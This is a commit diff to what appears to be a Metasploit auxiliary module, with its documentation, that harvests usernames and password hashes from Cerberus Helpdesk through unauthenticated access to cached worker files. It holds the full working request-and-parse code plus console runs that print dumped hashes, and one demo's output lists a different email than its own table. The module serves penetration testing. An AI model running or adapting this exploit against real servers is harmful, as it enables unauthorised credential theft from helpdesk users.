bcoles updates and table printing

h00die · h00die · commit cc9326d946a1 · 2017-06-24T13:01:39.000-04:00
diff --git a/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
@@ -20,10 +20,10 @@ Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/8
 
 1. Start msfconsole
 2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
-3. ```set rhosts```
+3. ```set rhosts [rhosts]```
 4. ```run```
 
-## Demo
+## Scenarios
 
 ### 4.2.3 using zend (not verbose)
 
@@ -33,29 +33,50 @@ Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/8
     rhosts => 1.1.1.1
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
     
-    [-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
-    [+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
-    [+] example:112302c209fe8d73f502c132a3da2b1c
-    [+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+    [-] Invalid response received for 1.1.1.1    for /storage/tmp/devblocks_cache---ch_workers
+    [+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+    [+] Found: example:112302c209fe8d73f502c132a3da2b1c
+    [+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+    
+    Cerberus Helpdesk User Credentials
+    ==================================
+    
+     Username                     Password Hash
+     --------                     -------------
+     admin                        aaa34a6111abf0bd1b1c4d7cd7ebb37b
+     example                      112302c209fe8d73f502c132a3da2b1c
+     foobar                       0d108d09e5bbe40aade3de5c81e9e9c7
+    
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
   ```
 
 ### 5.4.4 using devblocks
 
   ```
     msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure 
-    rhost => 192.168.2.45
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
     rhosts => 192.168.2.45
-    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set uri /cerb5/
-    uri => /cerb5/
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
+    targeturi => /cerb5/
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
     verbose => true
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
     
     [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
-    [+] bar@none.com:37b51d194a7513e45b56f6524f2d51f2
-    [+] foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
-    [+] admin@example.com:18126e7bd3f84b3f3e4df094def5b7de
+    [+] Found: bar@none.com:37b51d194a7513e45b56f6524f2d51f2
+    [+] Found: foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
+    [+] Found: mike@shorebreaksecurity.com:18126e7bd3f84b3f3e4df094def5b7de
+    
+    Cerberus Helpdesk User Credentials
+    ==================================
+    
+     Username                     Password Hash
+     --------                     -------------
+     bar@none.com                 37b51d194a7513e45b56f6524f2d51f2
+     foo@none.com                 acbd18db4cc2f85cedef654fccc4a4d8
+     admin@example.com            18126e7bd3f84b3f3e4df094def5b7de
+    
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
-  ```
+  ```
diff --git a/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
@@ -14,58 +14,69 @@ def initialize
       'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
       'Description'  => %q{
         This module extracts usernames and password hashes from the Cerberus Helpdesk
-        through an unauthenticated accss to a workers file.
+        through an unauthenticated access to a workers file.
         Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
         },
       'References'   =>
         [
           [ 'EDB', '39526' ]
         ],
-      'Author'       => [
-        'asdizzle_', # discovery
-        'h00die',    # module
+      'Author'       =>
+        [
+          'asdizzle_', # discovery
+          'h00die',    # module
         ],
-      'License'      => MSF_LICENSE
+      'License'      => MSF_LICENSE,
+      'DisclosureDate' => 'Mar 7 2016'
     )
 
     register_options(
       [
-        OptString.new('URI', [false, 'URL of the Cerberus Helpdesk root', '/'])
+        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
       ])
   end
 
   def run_host(rhost)
     begin
       ['devblocks', 'zend'].each do |site|
-        url = "#{datastore['URI']}storage/tmp/#{site}_cache---ch_workers"
+        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
         vprint_status("Attempting to load data from #{url}")
         res = send_request_cgi({'uri' => url})
-        if not res
+        if !res
           print_error("#{peer} Unable to connect to #{url}")
-        else
-          if res.body.include?('pass')
-            # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
-            # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
-            result = res.body.split('s:5')
-            result.each do |cred|
-              if cred.include?('email')
-                cred = cred.split(':')
-                username = cred[3].tr('";', '') # remove extra characters
-                username = username[0...-1] # also remove trailing s
-                password_hash = cred[7].tr('";', '') # remove extra characters
-                print_good("#{username}:#{password_hash}")
-                store_valid_credential(
-                  user:         username,
-                  private:      password_hash,
-                  private_type: :nonreplayable_hash
-                )
-              end
-            end
-            break # no need to get the 2nd url
-          else
-            print_error("Invalid response received for #{url}")
+          next
+        end
+
+        if !res.body.include?('pass')
+          print_error("Invalid response received for #{peer} for #{url}")
+          next
+        end
+
+        cred_table = Rex::Text::Table.new 'Header'  => 'Cerberus Helpdesk User Credentials',
+                                          'Indent'  => 1,
+                                          'Columns' => ['Username', 'Password Hash']
+
+        # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
+        # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
+        result = res.body.split('s:5')
+        result.each do |cred|
+          if cred.include?('email')
+            cred = cred.split(':')
+            username = cred[3].tr('";', '') # remove extra characters
+            username = username[0...-1] # also remove trailing s
+            password_hash = cred[7].tr('";', '') # remove extra characters
+            print_good("Found: #{username}:#{password_hash}")
+            store_valid_credential(
+              user:         username,
+              private:      password_hash,
+              private_type: :nonreplayable_hash
+            )
+            cred_table << [username, password_hash]
           end
         end
+        print_line
+        print_line cred_table.to_s
+        break
       end
 
     rescue ::Rex::ConnectionError
